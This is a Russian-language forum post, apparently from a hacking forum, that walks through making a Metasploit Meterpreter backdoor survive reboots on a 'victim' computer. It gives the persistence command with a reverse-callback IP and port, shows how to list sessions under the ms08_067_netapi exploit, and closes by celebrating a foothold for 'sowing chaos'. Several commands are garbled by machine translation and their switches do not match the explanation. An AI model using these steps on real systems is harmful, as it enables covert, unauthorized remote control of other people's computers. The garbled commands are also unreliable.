Как сделать Metasploit Meterpreter постоянным

  • Автор темы Автор темы LeSh1y777
  • Дата начала Дата начала

LeSh1y777

Пользователь
Регистрация
25/9/25
Сообщения
5,682
Репутация
49
Лайки
153
Депозит
-8.95$

Как удаленно установить автоматически переподключаемый постоянный бэкдор на чужой компьютер​

Большинство моих последних публикаций были посвящены использованию Meterpreter от Metasploit и тому, что можно сделать после его внедрения в систему жертвы. Это включает в себя удалённую установку кейлоггера, включение веб-камеры, включение микрофона и записи, а также отключение антивируса и многое другое. Список практически бесконечен.

К сожалению, Meterpreter перестаёт работать после перезагрузки системы-жертвы. В связи с этим многие из вас писали мне, спрашивая, можем ли мы сохранить Meterpreter на системе-жертве.

Ответ — однозначное «Да!»

Мы можем внедрить Meterpreter, а затем вернуться позже — даже после перезагрузки компьютера жертвы — и снова подключиться к нашему маленькому бэкдору или прослушивателю. В этой статье я покажу вам, как это сделать.

Начало работы​

Предположим, вам удалось внедрить Meterpreter в систему жертвы, и ваш экран выглядит так, как показано на скриншоте ниже. Если вы не знаете, как это сделать, ознакомьтесь с моими предыдущими публикациями.

Итак, начнем.

Шаг 1: Запуск сценария сохранения​

В Metasploit есть скрипт persistence, который позволяет настроить постоянный Meterpreter (прослушиватель) в системе жертвы. Для начала давайте рассмотрим параметры, доступные при запуске этого скрипта с ключом –h. В командной строке Meterpreter введите следующее:

meterpreter > запустить persistence -h

На снимке экрана выше мы видим, что…

  • –Коммутатор запускает соответствующий обработчик для подключения к агенту.
  • С помощью ключа -L мы сообщаем системе, где разместить Meterpreter в целевой системе.
  • Параметр –P указывает системе, какую полезную нагрузку использовать (по умолчанию используется Windows/Meterpreter/reverse_tcp, поэтому мы не будем использовать этот параметр).
  • -S запускает агент при загрузке с системными привилегиями.
  • Параметр -U запускает агент при входе пользователя (U) в систему.
  • Ключ -x запускает агент при загрузке системы.
  • С помощью ключа –i мы можем указать временной интервал между попытками подключения.
  • Параметр -p указывает порт, и наконец…
  • Параметр –r указывает IP-адрес нашей (r) системы, на которой работает Metasploit.
Здесь мы будем использовать переключатели –A, -L, -x, -i, -p и –r.

Введите в командной строке Meterpreter:

meterpreter >запустить сохранение –A –L c:\ -X 30 –p 443 –r 192.168.1.113

Затем эта команда запустит сценарий сохранения, который запустит соответствующий обработчик (-A), поместит Meterpreter в c:\ на целевой системе (-L c:\), запустит прослушиватель при загрузке системы (-x), будет проверять каждые 30 секунд наличие соединения (-i 30), подключится к порту 443 (-p 443) и подключится к локальной системе (нашей) по IP-адресу 192.168.1.113.

Шаг 2: Открытие второго сеанса​

Мы видим, что мы открыли сеанс Meterpreter на зараженной системе.

Возвращаемся к командной строке Metasploit, введя:

meterpreter > фон

Это вернет нас к командной строке msf, где теперь можно ввести:

эксплойт msf(ms08_067_netapi) > сеансы –i

Выше мы видим, что теперь на системе-жертве запущено два или более сеансов (на самом деле на этой жертве запущено три сеанса), поскольку постоянный Meterpreter открыл в системе второй сеанс.

Шаг 3: Тестирование​

Всё это очень здорово, но ключевой момент — сможет ли Meterpreter повторно подключиться к нашей системе даже после перезагрузки целевой системы. Мы можем проверить это, введя:

meterpreter > перезагрузка

Это перезагрузит целевую/жертвенную машину, и если все пройдет успешно, Meterpreter снова подключится к нашей системе.

Даже после перезагрузки системы Meterpreter на зараженной системе пытается подключиться к нам каждые 30 секунд, пока успешно не откроет сеанс для нас.

Теперь мы успешно открыли постоянное соединение на зараженной системе, к которому мы можем возвращаться снова и снова, чтобы сеять хаос!
 
Назад
Сверху Снизу